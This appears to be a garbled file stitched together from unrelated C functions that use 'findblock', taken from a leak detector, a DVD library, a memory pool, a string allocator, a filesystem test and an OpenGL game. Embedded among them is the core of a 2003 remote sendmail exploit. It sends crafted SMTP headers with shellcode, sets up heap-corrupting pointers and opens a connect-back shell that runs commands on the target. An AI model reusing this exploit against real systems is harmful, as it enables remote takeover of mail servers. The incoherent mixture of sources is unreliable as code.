int
markblock(ulong from, ulong fromval, Block *b)
{
Data *d;
ulong top;
Block *nb;
USED(from, fromval);
//print("trace 0x%.8lux from 0x%.8lux (%d)\n", b->addr, from, b->mark);
if(b->free){
// fprint(2, "possible dangling pointer *0x%.8lux = 0x%.8lux\n", from, fromval);
return 0;
}
if(b->mark)
return 0;
b->mark = 1;
nmark++;
if(d = finddata(b->addr)) {
assert(d->addr >= b->addr);
b->d = d;
top = b->addr+b->size;
for(; d < edata && d->addr < top; d++) {
assert(d->b == 0);
d->b = b;
if((nb = findblock(d->val-8)) || (nb = findblock(d->val-8-8)))
markblock(d->addr, d->val, nb);
}
return 1;
}
return 0;
}
int findsblock(int sptr) {
int optr,sidx,size;
size=gfirst ? 0x2c:0x04;
optr=sptr;
while(sidx=findblock(sptr,size,1)) {
sptr=IDX2PTR(sidx);
if (gfirst) {
if (validaddr(sptr)) {
ALLOCBLOCK(sidx,size);
break;
} else sptr=optr;
} else {
if (validaddr(sptr-0x18)&&freeblock(sidx-0x18,4)&&freeblock(sidx+0x0c,4)&&
freeblock(sidx+0x10,4)&&freeblock(sidx-0x0e,4)) {
ALLOCBLOCK(sidx-0x18,4);
ALLOCBLOCK(sidx-0x0e,2);
ALLOCBLOCK(sidx,4);
ALLOCBLOCK(sidx+0x0c,4);
ALLOCBLOCK(sidx+0x10,4);
sidx-=0x18;
break;
} else sptr=optr;
}
sptr+=4;
optr=sptr;
}
gfirst=0;
return sidx;
}
unsigned long remap_block(
remap_t *map, int domain, int title, int program,
unsigned long cblock, unsigned long offset)
{
block_t key;
block_t *b;
if (map->debug) {
fprintf(MSG_OUT, "libdvdnav: %s: domain %d, title %d, program %d, start %lx, next %lx\n",
map->title, domain, title, program, cblock, cblock+offset);
}
key.domain = domain;
key.title = title;
key.program = program;
key.start_block = key.end_block = cblock + offset;
b = findblock( map, &key);
if (b) {
if (map->debug) {
fprintf(MSG_OUT, "libdvdnav: Redirected to %lx\n", b->end_block);
}
return b->end_block - cblock;
}
return offset;
}
int amx_poolprotect(int index)
{
ARENA *hdr=findblock(index);
if (hdr==NULL)
return AMX_ERR_GENERAL;
hdr->lru=PROTECT_LRU;
return AMX_ERR_NONE;
}
/* amx_poolfind() returns the address of the memory block with the given index,
* or NULL if no such block exists. Parameter "index" should not be -1, because
* -1 represents a free block (actually, only positive values are valid).
* When amx_poolfind() finds the block, it increments its LRU count.
*/
void *amx_poolfind(int index)
{
ARENA *hdr=findblock(index);
if (hdr==NULL)
return NULL;
touchblock(hdr);
return (void*)((char*)hdr+sizeof(ARENA));
}
char *
findstring (const char * s)
{
block_t *b;
if ((b = findblock(s))) {
return STRING(b);
} else {
return (NULL);
}
}
const char *
ref_string (const char * str)
{
block_t *b;
b = BLOCK(str);
#ifdef DEBUG
if (b != findblock(str)) {
fatal("stralloc.c: called ref_string on non-shared string: %s.\n", str);
}
#endif /* defined(DEBUG) */
if (REFS(b))
REFS(b)++;
NDBG(b);
ADD_STRING(SIZE(b));
return str;
}
int findfblock(int fptr,int i1,int i2,int i3) {
int fidx,optr;
optr=fptr;
while(fidx=findblock(fptr,4,0)) {
fptr=IDX2PTR(fidx);
if (validaddr(fptr-i2)&&validaddr(fptr-i2-i3)&&freeblock(fidx-i3,4)&&
freeblock(fidx-i2-i3,4)&&freeblock(fidx-i2-i3+i1,4)) {
ALLOCBLOCK(fidx,4);
ALLOCBLOCK(fidx-i3,4);
ALLOCBLOCK(fidx-i2-i3,4);
ALLOCBLOCK(fidx-i2-i3+i1,4);
break;
} else fptr=optr;
fptr-=4;
optr=fptr;
}
return fidx;
}
static void remap_add_node( remap_t *map, block_t block) {
block_t *b;
int n;
b = findblock( map, &block);
if (b) {
/* overlaps an existing block */
mergeblock( b, block);
} else {
/* new block */
if (map->nblocks >= map->maxblocks) {
map->maxblocks += 20;
map->blocks = realloc( map->blocks, sizeof( block_t)*map->maxblocks);
}
n = map->nblocks++;
while (n > 0 && compare_block( &block, &map->blocks[ n-1]) < 0) {
map->blocks[ n] = map->blocks[ n-1];
n--;
}
map->blocks[ n] = block;
}
}
void
free_string (const char * str)
{
block_t **prev, *b;
int h;
b = BLOCK(str);
DEBUG_CHECK1(b != findblock(str),"stralloc.c: free_string called on non-shared string: %s.\n", str);
/*
* if a string has been ref'd USHRT_MAX times then we assume that its used
* often enough to justify never freeing it.
*/
if (!REFS(b))
return;
REFS(b)--;
SUB_STRING(SIZE(b));
NDBG(b);
if (REFS(b) > 0)
return;
h = StrHash(str);
prev = base_table + h;
while ((b = *prev)) {
if (STRING(b) == str) {
*prev = NEXT(b);
break;
}
prev = &(NEXT(b));
}
DEBUG_CHECK1(!b, "free_string: not found in string table! (\"%s\")\n", str);
SUB_NEW_STRING(SIZE(b), sizeof(block_t));
FREE(b);
CHECK_STRING_STATS;
}
int main(int argc,char **argv){
int sck,srv,i,j,cnt,jidx,aidx,sidx,fidx,aptr,sptr,fptr,ssize,fsize,jmp;
int c,l,i1,i2,i3,i4,found,vers=80,count=256,timeout=1,port=25;
fd_set readfs;
struct timeval t;
struct sockaddr_in address;
struct hostent *hp;
char buf[4096],cmd[4096];
char *p,*host,*myhost=NULL;
printf("copyright LAST STAGE OF DELIRIUM mar 2003 poland //lsd-pl.net/\n");
printf("sendmail 8.11.6 for Slackware 8.0 x86\n\n");
if (argc<3) {
printf("usage: %s target [-l localaddr] [-b localport] [-p ptr] [-c count] [-t timeout] [-v 80]\n",argv[0]);
exit(-1);
}
while((c=getopt(argc-1,&argv[1],"b:c:l:p:t:v:"))!=-1) {
switch(c) {
case 'b': port=atoi(optarg);break;
case 'c': count=atoi(optarg);break;
case 'l': myhost=optarg;break;
case 't': timeout=atoi(optarg);break;
case 'v': vers=atoi(optarg);break;
case 'p': sscanf(optarg,"%x",&MPTR);
}
}
host=argv[1];
srv=socket(AF_INET,SOCK_STREAM,0);
bzero(&address,sizeof(address));
address.sin_family=AF_INET;
address.sin_port=htons(port);
if (bind(srv,(struct sockaddr*)&address,sizeof(address))==-1) {
printf("error: bind\n");exit(-1);
}
if (listen(srv,10)==-1) {
printf("error: listen\n");exit(-1);
}
initasmcode(myhost,port);
for(i4=0;i4<count;i4++,MPTR+=cnt*4) {
PTR=MPTR;
sck=socket(AF_INET,SOCK_STREAM,0);
bzero(&address,sizeof(address));
address.sin_family=AF_INET;
address.sin_port=htons(25);
if ((address.sin_addr.s_addr=inet_addr(host))==-1) {
if ((hp=gethostbyname(host))==NULL) {
printf("error: address\n");exit(-1);
}
memcpy(&address.sin_addr.s_addr,hp->h_addr,4);
}
if (connect(sck,(struct sockaddr*)&address,sizeof(address))==-1) {
printf("error: connect\n");exit(-1);
}
initlookup();
sendcommand(sck,"helo yahoo.com\n",0);
sendcommand(sck,"mail from: [email protected]\n",0);
sendcommand(sck,"rcpt to: lp\n",0);
sendcommand(sck,"data\n",0);
aidx=findblock(PTR,PNUM*4,1);
ALLOCBLOCK(aidx,PNUM*4);
aptr=IDX2PTR(aidx);
printf(".");fflush(stdout);
jidx=findblock(PTR,strlen(shellcode)+PNUM*4,1);
ALLOCBLOCK(jidx,strlen(shellcode)+PNUM*4);
switch(vers) {
case 80: l=28;i1=0x46;i2=0x94;i3=0x1c;break;
default: exit(-1);
}
i2-=8;
p=buf;
for(i=0;i<138;i++) {
*p++='<';*p++='>';
}
*p++='(';
for(i=0;i<l;i++) *p++=NOP;
*p++=')';
*p++=0;
putaddr(&buf[OFF3+l],aptr);
sprintf(cmd,"From: %s\n",buf);
sendcommand(sck,cmd,0);
sendcommand(sck,"Subject: hello\n",0);
memset(cmd,NOP,MAXLINE);
cmd[MAXLINE-2]='\n';
cmd[MAXLINE-1]=0;
cnt=0;
while(cnt<PNUM) {
sptr=aptr;
fptr=IDX2PTR(OFF2);
if (!(sidx=findsblock(sptr))) break;
sptr=IDX2PTR(sidx);
if (!(fidx=findfblock(fptr,i1,i2,i3))) break;
fptr=IDX2PTR(fidx);
jmp=IDX2PTR(jidx);
while (!validaddr(jmp)) jmp+=4;
putaddr(&cmd[aidx],sptr);
putaddr(&cmd[sidx+0x24],aptr);
putaddr(&cmd[sidx+0x28],aptr);
putaddr(&cmd[sidx+0x18],fptr-i2-i3);
putaddr(&cmd[fidx-i2-i3],0x01010101);
putaddr(&cmd[fidx-i2-i3+i1],0xfffffff8);
putaddr(&cmd[fidx-i3],fptr-i3);
putaddr(&cmd[fidx],jmp);
aidx+=4;
PTR-=4;
cnt++;
}
p=&cmd[jidx+4*PNUM];
for(i=0;i<strlen(shellcode);i++) {
*p++=shellcode[i];
}
sendcommand(sck,cmd,0);
sendcommand(sck,"\n",0);
sendcommand(sck,".\n",0);
free(lookup);
FD_ZERO(&readfs);
FD_SET(0,&readfs);
FD_SET(srv,&readfs);
t.tv_sec=timeout;
t.tv_usec=0;
if (select(srv+1,&readfs,NULL,NULL,&t)>0) {
close(sck);
found=1;
if ((sck=accept(srv,(struct sockaddr*)&address,&l))==-1) {
printf("error: accept\n");exit(-1);
}
close(srv);
printf("\nbase 0x%08x mcicache 0x%08x\n",PTR,aptr);
write(sck,"/bin/uname -a\n",14);
} else {
close(sck);
found=0;
}
while(found){
FD_ZERO(&readfs);
FD_SET(0,&readfs);
FD_SET(sck,&readfs);
if(select(sck+1,&readfs,NULL,NULL,NULL)){
int cnt;
char buf[1024];
if(FD_ISSET(0,&readfs)){
if((cnt=read(0,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else {printf("koniec\n");exit(-1);}
}
write(sck,buf,cnt);
}
if(FD_ISSET(sck,&readfs)){
if((cnt=read(sck,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else {printf("koniec\n");exit(-1);}
}
write(1,buf,cnt);
}
}
}
}
}
static void
writeblks(char *fname, int fd, size_t alignment)
{
__uint64_t offset;
char *buffer = NULL;
int block;
struct flock64 fl;
if (!test) {
if (posix_memalign((void **) &buffer, alignment, blocksize)) {
perror("malloc");
exit(1);
}
memset(buffer, 0, blocksize);
}
/*
* Avoid allocation patterns being perturbed by different speculative
* preallocation beyond EOF configurations by first truncating the file
* to the expected maximum file size.
*/
if (ftruncate(fd, filesize) < 0) {
perror("ftruncate");
exit(EXIT_FAILURE);
}
do {
if (verbose && ((count % 100) == 0)) {
printf(".");
fflush(stdout);
}
block = findblock();
if (block < 0) {
perror("findblock");
exit(1);
}
offset = (__uint64_t) block * blocksize;
if (alloconly) {
if (test) continue;
fl.l_start = fileoffset + offset;
fl.l_len = blocksize;
fl.l_whence = 0;
if (xfscntl(fname, fd, RESVSP64, &fl) < 0) {
perror("xfsnctl(RESVSP64)");
exit(1);
}
continue;
}
SETBIT(valid, block);
if (!test) {
if (lseek64(fd, fileoffset + offset, SEEK_SET) < 0) {
perror("lseek");
exit(1);
}
/*
* Before writing, record offset at the base
* of the buffer and at offset 256 bytes
* into it. We'll verify this when we read
* it back in again.
*/
*(__uint64_t *) buffer = fileoffset + offset;
*(__uint64_t *) (buffer + 256) = fileoffset + offset;
if (write(fd, buffer, blocksize) < blocksize) {
perror("write");
exit(1);
}
}
if (verbose > 1) {
printf("%swriting data at offset=%llx\n",
test ? "NOT " : "",
(unsigned long long) (fileoffset + offset));
}
} while (--count);
free(buffer);
}
/* amx_poolalloc() allocates the requested number of bytes from the pool and
* returns a header to the start of it. Every block in the pool is prefixed
* with an "arena header"; the return value of this function points just
* behind this arena header.
*
* The block with the specified "index" should not already exist in the pool.
* In other words, parameter "index" should be unique for every of memory block,
* and the block should not change in size. Use amx_poolfind() to verify whether
* a block is already in the pool (and optionally amx_poolfree() to remove it).
*
* If no block of sufficient size is available, the routine frees blocks until
* the requested amount of memory can be allocated. There is no intelligent
* algorithm involved: the routine just frees the least-recently used block at
* every iteration (without considering the size of the block or whether that
* block is adjacent to a free block).
*/
void *amx_poolalloc(unsigned size,int index)
{
ARENA *hdr,*hdrlru;
unsigned sz;
unsigned short minlru;
assert(size>0);
assert(index>=0 && index<=SHRT_MAX);
assert(findblock(index)==NULL);
/* align the size to a cell boundary */
if ((size % sizeof(cell))!=0)
size+=sizeof(cell)-(size % sizeof(cell));
if (size+sizeof(ARENA)>pool_size)
return NULL; /* requested block does not fit in the pool */
/* find a block large enough to get the size plus an arena header; at
* the same time, detect the block with the lowest LRU
* if no block of sufficient size can be found, the routine then frees
* the block with the lowest LRU count and tries again
*/
do {
sz=pool_size;
hdr=(ARENA*)pool_base;
hdrlru=hdr;
minlru=USHRT_MAX;
while (sz>0) {
assert(sz<=pool_size);
assert((char*)hdr>=(char*)pool_base && (char*)hdr<(char*)pool_base+pool_size);
if (hdr->index==-1 && hdr->blocksize>=size)
break;
if (hdr->index!=-1 && hdr->lru<minlru) {
minlru=hdr->lru;
hdrlru=hdr;
} /* if */
sz-=hdr->blocksize+sizeof(ARENA);
hdr=(ARENA*)((char*)hdr+hdr->blocksize+sizeof(ARENA));
} /* while */
assert(sz<=pool_size);
if (sz==0) {
/* free up memory and try again */
assert(hdrlru->index!=-1);
amx_poolfree((char*)hdrlru+sizeof(ARENA));
} /* if */
} while (sz==0);
/* see whether to allocate the entire free block, or to cut it in two blocks */
if (hdr->blocksize>size+MIN_BLOCKSIZE+sizeof(ARENA)) {
/* cut the block in two */
ARENA *next=(ARENA*)((char*)hdr+size+sizeof(ARENA));
next->blocksize=hdr->blocksize-size-sizeof(ARENA);
next->index=-1;
next->lru=0;
} else {
size=hdr->blocksize;
} /* if */
hdr->blocksize=size;
hdr->index=(short)index;
touchblock(hdr); /* set LRU field */
return (void*)((char*)hdr+sizeof(ARENA));
}
void myMouse(int b,int s,int x,int y)
{
int j;
if(b==GLUT_LEFT_BUTTON && s==GLUT_DOWN)
{
if(count==0)
{
cur=findblock(x,y);
displayblock(cur);
hideblock(cur);
text(30.0,41.0,"Score :");
// Sprinti(x,y,num);
score=1;
printf("Score :%d\n",score);
// display();
Sprinti(37.0,41.0,score);
// display();
//glColor3f(0.5,0.7,0.3);
count=-1;
for(int m=0; m<25; m++)
allowed[m][cur]=-1;
}
else
{
// Sprinti(37.0,41.0,' ');
/* glColor3f(0.2,0.4,0.7);
glBegin(GL_POLYGON);
glVertex2d(36.0,43.0);
glVertex2d(36.0,40.0);
glVertex2d(38.0,40.0);
glVertex2d(38.0,43.0);
glEnd();*/
int i=findblock(x,y);
printf("findblock return %d\n",i);
if (allowed[cur][i]==-1)
glutIdleFunc(NULL);
else
{
if(allowed[cur][i]==1)
{
score+=1;
//display();
printf("%d\n",score);
Sprinti(37.0,41.0,score);
// display();
// glColor3f(0.5,0.7,0.3);
printf("allowed[%d][%d]\n",cur,i);
printf("findblock return %d\n",i);
displayblock(i);
}
hideblock(cur);
allowed[cur][i]=-1;
cur=i;
for(int m=0; m<25; m++)
allowed[m][cur]=-1;
}
}
if(score==25)
{
text(30.0,41.0,"You Won !!!");
glColor3f(0.5,0.7,0.3);
}
}
glFlush();
}
void
main(int argc, char **argv)
{
Biobuf bio;
char *p, *f[10];
int bitmap, c, nf, resolution, n8, n16, hdr, nhdr, nlhdr, nleak, x, y, nb;
ulong allocstart, allocend, len, u;
Data *d, *ed;
Block *b, *eb;
bitmap = 0;
resolution = 8;
x = 512;
ARGBEGIN{
case 'b':
bitmap=1;
break;
case 'r':
resolution = atoi(EARGF(sysfatal("usage")));
break;
case 'x':
x = atoi(EARGF(sysfatal("usage")));
break;
}ARGEND
n8 = n16 = 0;
allocstart = allocend = 0;
Binit(&bio, 0, OREAD);
while(p=Brdline(&bio, '\n')) {
p[Blinelen(&bio)-1] = '\0';
nf = tokenize(p, f, nelem(f));
if(nf >= 4 && strcmp(f[0], "data") == 0) {
if(ndata%64==0)
data = erealloc(data, (ndata+64)*sizeof(Data));
data[ndata].addr = strtoul(f[1], nil, 0);
data[ndata].val = strtoul(f[2], nil, 0);
data[ndata].type = f[3][0];
data[ndata].b = 0;
ndata++;
}
if(nf >= 5 && (strcmp(f[0], "block") == 0 || strcmp(f[0], "free") == 0)) {
if(nblock%64 == 0)
block = erealloc(block, (nblock+64)*sizeof(Block));
block[nblock].addr = strtoul(f[1], nil, 0);
block[nblock].size = strtoul(f[2], nil, 0);
block[nblock].w0 = strtoul(f[3], nil, 0);
block[nblock].w1 = strtoul(f[4], nil, 0);
if (nf >= 7) {
block[nblock].s0 = estrdup(f[5]);
block[nblock].s1 = estrdup(f[6]);
} else {
block[nblock].s0 = "";
block[nblock].s1 = "";
}
block[nblock].mark = 0;
block[nblock].d = 0;
block[nblock].free = strcmp(f[0], "free") == 0;
nblock++;
}
if(nf >= 4 && strcmp(f[0], "range") == 0 && strcmp(f[1], "alloc") == 0) {
allocstart = strtoul(f[2], 0, 0)&~15;
allocend = strtoul(f[3], 0, 0);
}
}
qsort(block, nblock, sizeof(Block), addrcmp);
qsort(data, ndata, sizeof(Data), addrcmp);
ed = edata = data+ndata;
for(d=data; d<ed; d++) {
if(d->type == 'a')
continue;
if(b = findblock(d->val-8)) // pool header 2 words
n8 += markblock(d->addr, d->val, b);
else if(b = findblock(d->val-8-8)) // sometimes malloc header 2 words
n16 += markblock(d->addr, d->val, b);
else
{}//print("noblock %.8lux\n", d->val);
}
Binit(&bio, 1, OWRITE);
if(bitmap){
if(n8 > n16) // guess size of header
hdr = 8;
else
hdr = 16;
for(d=data; d<ed; d++)
if(d->type=='a')
break;
if(d==ed)
sysfatal("no allocated data region");
len = (allocend-allocstart+resolution-1)/resolution;
y = (len+x-1)/x;
Bprint(&bio, "%11s %11d %11d %11d %11d ", "m8", 0, 0, x, y);
//fprint(2, "alloc %lux %lux x %d y %d res %d\n", allocstart, allocend, x, y, resolution);
b = block;
eb = block+nblock;
for(u = allocstart; u<allocend; u+=resolution){
//fprint(2, "u %lux %lux baddr %lux\n", u, u+resolution, b->addr);
while(b->addr+b->size <= u && b < eb)
//{
//fprint(2, "\tskip %lux %lux\n", b->addr, b->addr+b->size);
b++;
//}
nhdr = 0;
nleak = 0;
nb = 0;
nlhdr = 0;
if(block < b && u < (b-1)->addr+(b-1)->size)
b--;
for(; b->addr < u+resolution && b < eb; b++){
//fprint(2, "\tblock %lux %lux %d\n", b->addr, b->addr+b->size, b->mark);
if(rXr(b->addr, b->addr+hdr, u, u+resolution)
|| rXr(b->addr+b->size-8, b->addr+b->size, u, u+resolution)){
if(b->mark == 0 && !b->free)
nlhdr++;
else
nhdr++;
}
if(b->mark == 0 && !b->free)
nleak++;
nb++;
}
if(nhdr)
c = HdrColor;
else if(nlhdr)
c = LeakHdrColor;
else if(nleak)
c = LeakColor;
else if(nb)
c = AllocColor;
else
c = FreeColor;
//fprint(2, "\t%d\n", c);
Bputc(&bio, c);
}
allocend = allocstart+x*y*resolution;
for(; u < allocend; u+=resolution)
Bputc(&bio, NoColor);
}else{
eb = block+nblock;
for(b=block; b<eb; b++)
if(b->mark == 0 && !b->free)
Bprint(&bio, "block 0x%.8lux 0x%.8lux 0x%.8lux 0x%.8lux %s %s\n", b->addr, b->size, b->w0, b->w1, b->s0, b->s1);
}
Bterm(&bio);
}
